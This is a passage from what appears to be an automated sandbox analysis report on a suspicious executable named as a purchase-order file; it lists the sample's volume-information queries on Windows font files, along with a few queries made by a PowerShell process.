Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
